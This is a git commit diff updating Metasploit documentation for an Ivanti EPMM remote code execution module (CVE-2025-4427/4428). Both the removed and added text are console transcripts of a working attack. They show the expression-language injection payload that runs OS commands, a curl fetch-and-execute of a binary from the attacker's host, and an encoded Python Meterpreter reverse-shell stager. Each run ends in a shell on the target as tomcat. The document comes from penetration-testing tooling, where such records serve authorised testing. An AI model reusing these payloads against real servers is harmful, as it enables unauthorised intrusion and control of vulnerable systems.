Update documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md

remmons-r7 · bwatters-r7 · web-flow · commit 97f308386b04 · 2025-06-04T08:30:11.000-05:00
Update docs to reflect the new Python payload approach

Co-authored-by: Brendan &lt;bwatters@rapid7.com&gt;
diff --git a/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md b/documentation/modules/exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428.md
@@ -24,42 +24,28 @@ No custom options exist for this module.
 ## Scenarios
 ### Ivanti EPMM (MobileIron Core) Linux Target
 ```
-msf6 > use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428
-[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options 
+msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options
 
 Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):
 
    Name       Current Setting  Required  Description
    ----       ---------------  --------  -----------
-   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, so
+                                         cks4, socks5, socks5h, http
+   RHOSTS     10.5.132.244     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
+                                         asploit.html
    RPORT      443              yes       The target port (TCP)
    SSL        true             yes       Negotiate SSL/TLS for outgoing connections
    TARGETURI  /                yes       The base path to Ivanti EPMM
    VHOST                       no        HTTP server virtual host
 
 
-Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+Payload options (python/meterpreter/reverse_tcp):
 
-   Name            Current Setting  Required  Description
-   ----            ---------------  --------  -----------
-   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
-   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
-   FETCH_SRVHOST                    no        Local IP to use for serving payload
-   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                    no        Local URI to use for serving payload
-   LHOST                            yes       The listen address (an interface may be specified)
-   LPORT           4444             yes       The listen port
-
-
-   When FETCH_FILELESS is false:
-
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_FILENAME      EUAqTWOdJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
-   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
 
 
 Exploit target:
@@ -72,51 +58,21 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set RHOSTS 192.168.181.148
-RHOSTS => 192.168.181.148
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set LHOST 192.168.181.129 
-LHOST => 192.168.181.129
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set FETCH_SRVPORT 9191
-FETCH_SRVPORT => 9191
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set VERBOSE true
-VERBOSE => true
-msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > check
-[*] Payload pt. 1/1: id
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
-[+] 192.168.181.148:443 - The target is vulnerable. Successfully executed command
 msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
-[*] Command to run on remote host: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw;chmod +x /var/tmp/lktEmYrRyAfw;/var/tmp/lktEmYrRyAfw&
-[*] Fetch handler listening on 192.168.181.129:9191
-[*] HTTP server started
-[*] Adding resource /rwwkKagVT2DQx25BSXklfw
-[*] Started reverse TCP handler on 192.168.181.129:4444 
-[*] Running automatic check ("set AutoCheck false" to disable)
-[*] Payload pt. 1/1: id
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
-[+] The target is vulnerable. Successfully executed command
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
 [*] Attempting to execute payload
-[*] Payload pt. 1/3: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Client 192.168.181.148 requested /rwwkKagVT2DQx25BSXklfw
-[*] Sending payload to 192.168.181.148 (curl/7.29.0)
-[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
-[*] Payload pt. 2/3: chmod +x /var/tmp/lktEmYrRyAfw
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Command pt 2 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
-[*] Payload pt. 3/3: /var/tmp/lktEmYrRyAfw &
-[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('/var/tmp/lktEmYrRyAfw &').getInputStream()).useDelimiter('%5C%5CA').next()}
-[*] Meterpreter session 1 opened (192.168.181.129:4444 -> 192.168.181.148:38980) at 2025-05-28 16:31:52 -0500
-[*] No command pt 3 response expected
-
-meterpreter > getuid 
+[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('python3 -c exec(__import__("base64").b64decode("ZXhlYyhfX2ltcG9ydF9fKCd6bGliJykuZGVjb21wcmVzcyhfX2ltcG9ydF9fKCdiYXNlNjQnKS5iNjRkZWNvZGUoX19pbXBvcnRfXygnY29kZWNzJykuZ2V0ZW5jb2RlcigndXRmLTgnKSgnZU5vOVVFMUx4REFRUFRlL0lyY2tHRU83dG50WXJDRGlRVVFFMTV1SXRNbW9vV2tTa3F4V3hmOXVReGJuTU1PYmVmUG1ROC9laFlTamt4TWsvbTMweU1jaHdyYmxNWVdEVER6cEdkQ3JDM2pCMnVJdzJEZWdUYzEycUVyaGEvVlY3RXV6S0lGdStCSHY3Njl1WC9hUEQ5ZVhkeXp6aEhUV2dreVVrcVlXbldqT09yR3BHOExiMVZpbWpBR0dDVld3U1BBcGErZmhJaG9BVHp1R1RGOTJFZ2ZyQnpsUmNuRkRlQlFCNUFkZEJaN3FaNlQ2SXpZTWZiNXJBOWlBcFlxZG0xVk9uZnhYVDB1YUlWaEEwbnkyVUNEZDdBUEVTTXNIeExodGMxSkJadklmRXNrdS9qTDBCOGd3WHZBPScpWzBdKSkp"))').getInputStream()).useDelimiter('%5C%5CA').next()}
+[*] Sending stage (24768 bytes) to 10.5.132.244
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.244:50322) at 2025-06-03 13:38:16 -0500
+meterpreter > sysinfo
+Computer        : ivanti.example.local
+OS              : Linux 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
 Server username: tomcat
-meterpreter > sysinfo 
-Computer     : core.mobileiron.local
-OS           : CentOS 7.6.1810 (Linux 3.10.0-1160.6.1.el7.x86_64)
-Architecture : x64
-BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux
-meterpreter > 
+meterpreter > exit
+
 ```
